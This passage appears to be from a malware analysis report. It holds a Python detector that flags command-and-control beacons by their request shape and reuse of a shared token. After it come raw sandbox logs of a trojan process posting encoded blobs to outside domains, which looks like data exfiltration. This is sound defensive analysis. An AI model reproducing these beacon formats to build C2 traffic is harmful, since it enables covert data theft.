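plus one constructed benign request as a control. The indicator names, the
regular expressions and THRESHOLD are this example's own assumptions.
"""
import re
from urllib.parse import urlsplit

BOT_UA = re.compile(r"bot|crawler|spider", re.I)       # crawler UA from a workstation
SHORT_PATH = re.compile(r"^/[a-z0-9]{3,6}/$")          # /ou8k/, /wl3x/, /xbnt/, /fpja/
B64ISH = re.compile(r"^[A-Za-z0-9+/]{20,}={0,2}$")     # one opaque, padded blob
THRESHOLD = 4                                          # assumption: 4 of 5 indicators

UA = "Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)"
CAPTURED = [  # constructed from sessions 0, 1, 4, 5 and 8; blobs shortened
    "GET /ou8k/?TXVlY=nv6XU20pgPTDN0&94=sHhXhPPev91RFxpjPhHA/72AjtyYVyN8Fxcd9dT6JE90JPwt9aU6w+ea6SVS8TAmTGQ= HTTP/1.1\n"
    f"Host: www.aoivej.info\nConnection: close\nUser-Agent: {UA}\n",
    "POST /wl3x/ HTTP/1.1\nHost: www.givvjn.info\nOrigin: http://www.givvjn.info\n"
    "Referer: http://www.givvjn.info/wl3x/\nContent-Type: application/x-www-form-urlencoded\n"
    f"Connection: close\nUser-Agent: {UA}\n\n"
    "94=FBvfvEoMtYaKof9LiBimoGxQ5vTkFtQZPSQngttMeQhrMMflPXgymPiRDlRpGu5hR+HA8dvq3U2TZoEvu2aK==",
    "GET /wl3x/?94=IDH/sxYsqLulkbcslybjsGNv3NS6VvVpNQ4SjbhBVw1Jeu7sJntH54CcC3lqE89WX7ek1cbvwkrNRP5o0zeI9ZMZ+p0PiMQ=&TXVlY=nv6XU20pgPTDN0 HTTP/1.1\n"
    f"Host: www.givvjn.info\nConnection: close\nUser-Agent: {UA}\n",
    "POST /xbnt/ HTTP/1.1\nHost: www.gern.dev\nOrigin: http://www.gern.dev\n"
    "Referer: http://www.gern.dev/xbnt/\nContent-Type: application/x-www-form-urlencoded\n"
    f"Connection: close\nUser-Agent: {UA}\n\n"
    "94=mogvKCZbuOVZjsfagKW2bxcWEDyrEQZ6M0uJpw4gzspItVT003USGIdEkCAuGkiJheT5/KlEfdSpDzLZ26Ljfxt8==",
    "GET /xbnt/?94=rqIPJyQOuOJXv4fam5ihbRMSLxb0TSwIBDm/oxxW981wllDAxGsmTrFlhRhIH2nC7YG/ucdsY/agAUz7mNPlVDgekBEOU7d1Vgzm=&TXVlY=nv6XU20pgPTDN0 HTTP/1.1\n"
    f"Host: www.gern.dev\nConnection: close\nUser-Agent: {UA}\n",
    # constructed benign control (ordinary browser page load), not from the report
    "GET /index.html HTTP/1.1\nHost: www.example.com\nConnection: keep-alive\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/128.0\n",
]


def split_params(qs: str) -> list[tuple[str, str]]:
    """Split k=v&k=v without URL-decoding, so '+' and '=' padding in blobs survive."""
    pairs = []
    for part in qs.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition("\n\n")
    lines = head.strip().splitlines()
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body.strip()}


def beacon_indicators(req: dict) -> list[str]:
    """Return the structural indicators this request matches, in a fixed order."""
    h, url = req["headers"], urlsplit(req["target"])
    hits = []
    if SHORT_PATH.match(url.path):
        hits.append("short-random-path")
    if BOT_UA.search(h.get("user-agent", "")):
        hits.append("crawler-user-agent")
    if h.get("connection", "").lower() == "close":
        hits.append("connection-close")
    params = split_params(url.query if req["method"] == "GET" else req["body"])
    if any(B64ISH.match(value) for _, value in params):
        hits.append("opaque-base64-param")
    host = h.get("host", "")
    if (req["method"] == "POST" and h.get("origin") == f"http://{host}"
            and h.get("referer") == f"http://{host}{url.path}"):
        hits.append("self-referer-origin")
    return hits


def classify(raw_requests: list[str]) -> list[tuple[str, str, list[str], bool]]:
    """Return (host, method, indicators, flagged) per request; flagged at THRESHOLD hits."""
    out = []
    for raw in raw_requests:
        req = parse_request(raw)
        hits = beacon_indicators(req)
        out.append((req["headers"].get("host", "?"), req["method"], hits, len(hits) >= THRESHOLD))
    return out


def correlate_hosts(raw_requests: list[str]) -> dict[str, set[str]]:
    """Map each short (non-blob) GET parameter to the set of hosts that received it verbatim;
    a token reused across unrelated domains is the strongest pivot in this capture."""
    seen: dict[str, set[str]] = {}
    for raw in raw_requests:
        req = parse_request(raw)
        if req["method"] != "GET":
            continue
        for key, value in split_params(urlsplit(req["target"]).query):
            if not B64ISH.match(value):
                seen.setdefault(f"{key}={value}", set()).add(req["headers"]["host"])
    return {token: hosts for token, hosts in seen.items() if len(hosts) > 1}


if __name__ == "__main__":
    for host, method, hits, flagged in classify(CAPTURED):
        print(f"{'BEACON' if flagged else 'ok    '} {method:4} {host:18} {hits}")
    print(correlate_hosts(CAPTURED))
```

Run stand-alone, the five report-derived requests score four or five indicators and the control scores none; correlate_hosts returns the TXVlY token mapped to www.aoivej.info, www.givvjn.info and www.gern.dev. For production use, the same five checks translate directly into a proxy-log or Suricata rule, keyed on request shape rather than on the domains, which this sample discards after one round each.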


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                9 | 192.168.2.4 | 49968 | 176.57.65.76 | 80 | 5552 | C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Jan 11, 2025 06:56:11.381519079 CET | 661 | OUT | POST /fpja/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.newbh.pro
                                                Origin: http://www.newbh.pro
                                                Referer: http://www.newbh.pro/fpja/
                                                Content-Length: 199
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Data Raw: 39 34 3d 46 57 47 32 41 36 4a 7a 59 51 49 75 67 63 5a 32 57 76 43 62 6e 77 55 31 41 46 62 38 42 34 6e 47 4b 41 38 39 61 7a 39 76 37 34 79 4f 2b 48 6a 58 36 31 4c 72 4d 4e 59 44 74 47 31 55 30 79 51 74 6e 49 36 41 79 76 5a 52 72 72 62 71 71 49 51 66 4f 4e 37 4b 4f 42 49 41 36 2f 4a 52 41 47 43 53 53 4a 76 54 31 31 74 76 50 31 35 45 62 53 73 76 6d 2b 34 74 52 65 55 76 49 65 31 73 2f 32 71 6c 53 78 41 4e 31 32 6d 59 2f 51 2f 7a 43 48 4b 62 46 79 31 37 5a 69 4b 50 62 62 4f 4f 41 46 71 6f 47 4c 65 6b 69 74 58 6e 32 55 52 45 52 54 55 2b 44 7a 75 4e 75 4e 4f 33 46 4a 50 4f 45 51 72 68 39 67 3d 3d
                                                Data Ascii: 94=FWG2A6JzYQIugcZ2WvCbnwU1AFb8B4nGKA89az9v74yO+HjX61LrMNYDtG1U0yQtnI6AyvZRrrbqqIQfON7KOBIA6/JRAGCSSJvT11tvP15EbSsvm+4tReUvIe1s/2qlSxAN12mY/Q/zCHKbFy17ZiKPbbOOAFqoGLekitXn2URERTU+DzuNuNO3FJPOEQrh9g==
                                                Jan 11, 2025 06:56:12.053580999 CET | 914 | IN | HTTP/1.1 301 Moved Permanently
                                                Server: ddos-guard
                                                Connection: close
                                                Set-Cookie: __ddg8_=QoGVZkcX52ek5UwT; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 06:16:11 GMT
                                                Set-Cookie: __ddg9_=8.46.123.189; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 06:16:11 GMT
                                                Set-Cookie: __ddg10_=1736574971; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 06:16:11 GMT
                                                Set-Cookie: __ddg1_=hnguRe6OpCIZTgf8c7rx; Domain=.newbh.pro; HttpOnly; Path=/; Expires=Sun, 11-Jan-2026 05:56:11 GMT
                                                date: Sat, 11 Jan 2025 05:56:11 GMT
                                                content-type: text/html; charset=iso-8859-1
                                                content-length: 235
                                                location: https://www.newbh.pro/fpja/
                                                x-host: www.newbh.pro
                                                x-tilda-server: 31
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 65 77 62 68 2e 70 72 6f 2f 66 70 6a 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.newbh.pro/fpja/">here</a>.</p></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                10 | 192.168.2.4 | 49988 | 176.57.65.76 | 80 | 5552 | C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Jan 11, 2025 06:56:13.942823887 CET | 681 | OUT | POST /fpja/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.newbh.pro
                                                Origin: http://www.newbh.pro
                                                Referer: http://www.newbh.pro/fpja/
                                                Content-Length: 219
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Data Raw: 39 34 3d 46 57 47 32 41 36 4a 7a 59 51 49 75 6d 2f 52 32 56 4d 36 62 68 51 55 79 44 46 62 38 55 49 6e 43 4b 41 67 39 61 79 70 2f 37 4b 47 4f 77 48 54 58 37 30 4c 72 4e 4e 59 44 6c 6d 31 4d 70 69 51 32 6e 49 48 39 79 71 68 52 72 76 4c 71 71 4b 49 66 53 75 54 4a 63 68 49 43 79 66 4a 58 64 32 43 53 53 4a 76 54 31 31 35 4a 50 31 52 45 61 69 63 76 6e 61 73 73 4e 4f 55 73 65 4f 31 73 30 57 71 68 53 78 42 6f 31 33 36 68 2f 57 6a 7a 43 47 36 62 47 6a 31 30 43 79 4b 4a 47 72 50 62 4c 77 48 76 4b 4c 6a 31 67 73 44 6f 33 6d 68 69 64 31 5a 6b 53 43 50 61 38 4e 71 45 59 4f 47 36 4a 54 57 6f 6d 73 63 7a 61 6c 66 4e 65 4d 75 46 5a 5a 78 6b 4e 71 4d 4e 31 2f 6b 3d
                                                Data Ascii: 94=FWG2A6JzYQIum/R2VM6bhQUyDFb8UInCKAg9ayp/7KGOwHTX70LrNNYDlm1MpiQ2nIH9yqhRrvLqqKIfSuTJchICyfJXd2CSSJvT115JP1REaicvnassNOUseO1s0WqhSxBo136h/WjzCG6bGj10CyKJGrPbLwHvKLj1gsDo3mhid1ZkSCPa8NqEYOG6JTWomsczalfNeMuFZZxkNqMN1/k=
                                                 Jan 11, 2025 06:56:14.744049072 CET  914 bytes  IN  HTTP/1.1 301 Moved Permanently
                                                Server: ddos-guard
                                                Connection: close
                                                Set-Cookie: __ddg8_=EGkkD1U5XW0S0n4E; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 06:16:14 GMT
                                                Set-Cookie: __ddg9_=8.46.123.189; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 06:16:14 GMT
                                                Set-Cookie: __ddg10_=1736574974; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 06:16:14 GMT
                                                Set-Cookie: __ddg1_=CA7EZo0jCZ9eN0VEFAzJ; Domain=.newbh.pro; HttpOnly; Path=/; Expires=Sun, 11-Jan-2026 05:56:14 GMT
                                                date: Sat, 11 Jan 2025 05:56:14 GMT
                                                content-type: text/html; charset=iso-8859-1
                                                content-length: 235
                                                location: https://www.newbh.pro/fpja/
                                                x-host: www.newbh.pro
                                                x-tilda-server: 27
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 65 77 62 68 2e 70 72 6f 2f 66 70 6a 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.newbh.pro/fpja/">here</a>.</p></body></html>


                                                 Session ID: 11  Source IP: 192.168.2.4  Source Port: 50005  Destination IP: 176.57.65.76  Destination Port: 80  PID: 5552  Process: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                 Timestamp  Bytes transferred  Direction  Data
                                                 Jan 11, 2025 06:56:16.492037058 CET  3708 bytes  OUT  POST /fpja/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.newbh.pro
                                                Origin: http://www.newbh.pro
                                                Referer: http://www.newbh.pro/fpja/
                                                Content-Length: 10299
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Data Raw: 39 34 3d 46 57 47 32 41 36 4a 7a 59 51 49 75 6d 2f 52 32 56 4d 36 62 68 51 55 79 44 46 62 38 55 49 6e 43 4b 41 67 39 61 79 70 2f 37 4b 65 4f 77 30 62 58 36 54 66 72 66 39 59 44 6b 6d 31 50 70 69 51 33 6e 49 65 32 79 71 64 6e 72 74 44 71 72 76 63 66 43 66 54 4a 46 52 49 43 2b 2f 4a 53 41 47 44 61 53 4a 2f 58 31 31 70 4a 50 31 52 45 61 68 45 76 75 75 34 73 50 4f 55 76 49 65 31 6f 2f 32 72 32 53 78 5a 53 31 33 2b 78 2f 6c 37 7a 44 6d 71 62 45 52 64 30 4f 79 4b 4c 46 72 4f 59 4c 77 44 67 4b 49 58 35 67 73 32 46 33 6c 39 69 65 44 51 4f 49 7a 33 58 68 76 6d 2b 44 65 61 64 4a 77 47 75 6c 76 6f 71 4c 46 66 31 46 49 6d 4b 61 2b 49 41 53 71 64 53 75 4b 51 39 76 62 2f 30 2f 76 4a 52 67 34 56 4d 34 74 36 45 35 69 2b 62 6a 6b 43 6f 39 63 32 52 36 45 64 65 4a 63 48 77 59 61 4e 2f 76 43 43 6f 57 42 43 54 58 4e 79 74 64 61 4b 38 39 41 46 56 58 42 34 34 69 46 31 62 77 47 6c 61 37 53 66 33 32 72 7a 52 48 44 56 44 42 67 67 38 36 46 72 55 4f 44 2b 30 68 56 36 59 39 65 58 36 43 31 4e 34 56 32 4e 54 4e 4d 33 2f 55 34 38 [TRUNCATED]
                                                 Data Ascii: 94=[TRUNCATED]
                                                 Jan 11, 2025 06:56:16.492074013 CET  7055 bytes  OUT  Data Raw: 63 37 78 58 44 43 49 73 78 6f 4c 4b 7a 6e 59 33 57 34 63 6d 51 61 79 72 36 51 4c 2f 75 69 2b 61 6b 6f 74 46 61 2f 4f 44 48 6b 45 70 6e 61 57 33 78 76 79 46 67 66 62 57 75 49 45 36 6f 6a 7a 61 39 63 46 58 45 33 70 61 2b 72 55 67 55 65 68 4d 53 69
                                                Data Ascii: c7xXDCIsxoLKznY3W4cmQayr6QL/ui+akotFa/ODHkEpnaW3xvyFgfbWuIE6ojza9cFXE3pa+rUgUehMSiACM0O+EcFHuq7Cgm8RnKgV+bbXO3kA1wdexUT2Tu43nh9z7l8Z9hsIajY8i4ryThix1fEvM55yvDWrZMqQV4SPRaFtDlEZvbfGHrVcitJGTrQUj2ylDWyFD+XTOztTnYHx6Pzq3SCp0egMWZy/KdL6BqwZ+XXR+WC
                                                 Jan 11, 2025 06:56:17.764714956 CET  926 bytes  IN  HTTP/1.1 301 Moved Permanently
                                                Server: ddos-guard
                                                Connection: close
                                                Set-Cookie: __ddg8_=kHZkhvvw60sqhNiU; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 06:16:16 GMT
                                                Set-Cookie: __ddg9_=8.46.123.189; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 06:16:16 GMT
                                                Set-Cookie: __ddg10_=1736574976; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 06:16:16 GMT
                                                Set-Cookie: __ddg1_=W5JBhRmvQRY3zZx3FVwh; Domain=.newbh.pro; HttpOnly; Path=/; Expires=Sun, 11-Jan-2026 05:56:16 GMT
                                                date: Sat, 11 Jan 2025 05:56:17 GMT
                                                content-type: text/html; charset=iso-8859-1
                                                content-length: 235
                                                location: https://www.newbh.pro/fpja/
                                                x-ws-id: 2
                                                x-host: www.newbh.pro
                                                x-tilda-server: 30
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 65 77 62 68 2e 70 72 6f 2f 66 70 6a 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.newbh.pro/fpja/">here</a>.</p></body></html>


                                                 Session ID: 12  Source IP: 192.168.2.4  Source Port: 50016  Destination IP: 176.57.65.76  Destination Port: 80  PID: 5552  Process: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                 Timestamp  Bytes transferred  Direction  Data
                                                 Jan 11, 2025 06:56:19.033027887 CET  412 bytes  OUT  GET /fpja/?94=IUuWDP5KSR42idQ9Y9SbpAQIPkOXQJnBaCctSylP56Crxmno30P/P9QjtU4p0BAyo+b46pZB1tLFie03XqTXOgpd68BkSHP+aMLU3EdNDzM0cA8Rv+lzAIQ=&TXVlY=nv6XU20pgPTDN0 HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Host: www.newbh.pro
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                 Jan 11, 2025 06:56:19.683763981 CET  1208 bytes  IN  HTTP/1.1 301 Moved Permanently
                                                Server: ddos-guard
                                                Connection: close
                                                Set-Cookie: __ddg8_=wucomD3blGYZdJCK; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 06:16:19 GMT
                                                Set-Cookie: __ddg9_=8.46.123.189; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 06:16:19 GMT
                                                Set-Cookie: __ddg10_=1736574979; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 06:16:19 GMT
                                                Set-Cookie: __ddg1_=7DQjPA123E9Ri9ILrPXr; Domain=.newbh.pro; HttpOnly; Path=/; Expires=Sun, 11-Jan-2026 05:56:19 GMT
                                                date: Sat, 11 Jan 2025 05:56:19 GMT
                                                content-type: text/html; charset=iso-8859-1
                                                content-length: 384
                                                location: https://www.newbh.pro/fpja/?94=IUuWDP5KSR42idQ9Y9SbpAQIPkOXQJnBaCctSylP56Crxmno30P/P9QjtU4p0BAyo+b46pZB1tLFie03XqTXOgpd68BkSHP+aMLU3EdNDzM0cA8Rv+lzAIQ=&TXVlY=nv6XU20pgPTDN0
                                                x-host: www.newbh.pro
                                                x-tilda-server: 29
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 65 77 62 68 2e 70 72 6f 2f 66 70 6a 61 2f 3f 39 34 3d 49 55 75 57 44 50 35 4b 53 52 34 32 69 64 51 39 59 39 53 62 70 41 51 49 50 6b 4f 58 51 4a 6e 42 61 43 63 74 53 79 6c 50 35 36 43 72 78 6d 6e 6f 33 30 50 2f 50 39 51 6a 74 55 34 70 30 42 41 79 6f 2b 62 34 36 70 5a 42 31 74 4c 46 69 65 30 33 58 71 54 58 4f 67 70 64 36 38 42 6b 53 48 50 2b 61 4d 4c 55 33 45 64 4e 44 7a 4d 30 63 41 38 52 76 2b 6c 7a 41 49 51 3d 26 61 6d 70 3b 54 58 56 6c 59 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.newbh.pro/fpja/?94=IUuWDP5KSR42idQ9Y9SbpAQIPkOXQJnBaCctSylP56Crxmno30P/P9QjtU4p0BAyo+b46pZB1tLFie03XqTXOgpd68BkSHP+aMLU3EdNDzM0cA8Rv+lzAIQ=&amp;TXVlY=nv6XU20pgPTDN0">here</a>.</p></body></html>


                                                 Session ID: 13  Source IP: 192.168.2.4  Source Port: 50017  Destination IP: 209.74.79.41  Destination Port: 80  PID: 5552  Process: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                 Timestamp  Bytes transferred  Direction  Data
                                                 Jan 11, 2025 06:56:24.734296083 CET  670 bytes  OUT  POST /b0aw/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Host: www.thinkone.xyz
                                                Origin: http://www.thinkone.xyz
                                                Referer: http://www.thinkone.xyz/b0aw/
                                                Content-Length: 199
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: no-cache
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
                                                Data Raw: 39 34 3d 59 4d 47 59 75 52 61 68 39 6f 31 35 72 58 54 4b 53 72 51 54 44 59 4c 53 63 62 51 4a 58 57 71 6f 6d 41 53 72 53 38 74 71 72 59 4c 39 6d 39 34 70 5a 4d 56 63 76 73 55 67 47 53 45 75 4a 2f 77 54 54 38 35 31 49 74 49 49 47 6c 33 69 76 59 44 44 43 77 47 38 56 37 48 4e 4a 68 6b 43 71 4c 67 41 6c 71 74 38 42 66 68 64 59 61 36 51 79 63 71 6a 65 63 6f 6d 49 4b 71 48 71 38 5a 41 71 79 6d 4b 49 37 2f 59 6e 4e 70 79 30 49 6d 38 65 32 70 58 4b 6b 38 73 7a 41 4b 74 76 54 69 75 69 53 38 4d 75 5a 62 69 6e 36 44 61 70 51 74 53 75 53 77 56 6f 59 62 33 48 41 75 46 47 77 46 41 45 75 63 31 6c 77 3d 3d
                                                Data Ascii: 94=YMGYuRah9o15rXTKSrQTDYLScbQJXWqomASrS8tqrYL9m94pZMVcvsUgGSEuJ/wTT851ItIIGl3ivYDDCwG8V7HNJhkCqLgAlqt8BfhdYa6QycqjecomIKqHq8ZAqymKI7/YnNpy0Im8e2pXKk8szAKtvTiuiS8MuZbin6DapQtSuSwVoYb3HAuFGwFAEuc1lw==
                                                 Jan 11, 2025 06:56:25.298573971 CET  533 bytes  IN  HTTP/1.1 404 Not Found
                                                Date: Sat, 11 Jan 2025 05:56:25 GMT
                                                Server: Apache
                                                Content-Length: 389
                                                Connection: close
                                                Content-Type: text/html
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                 Session ID: 14  Source IP: 192.168.2.4  Source Port: 50018  Destination IP: 209.74.79.41  Destination Port: 80  PID: 5552  Process: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
                                                 Timestamp  Bytes transferred  Direction  Data
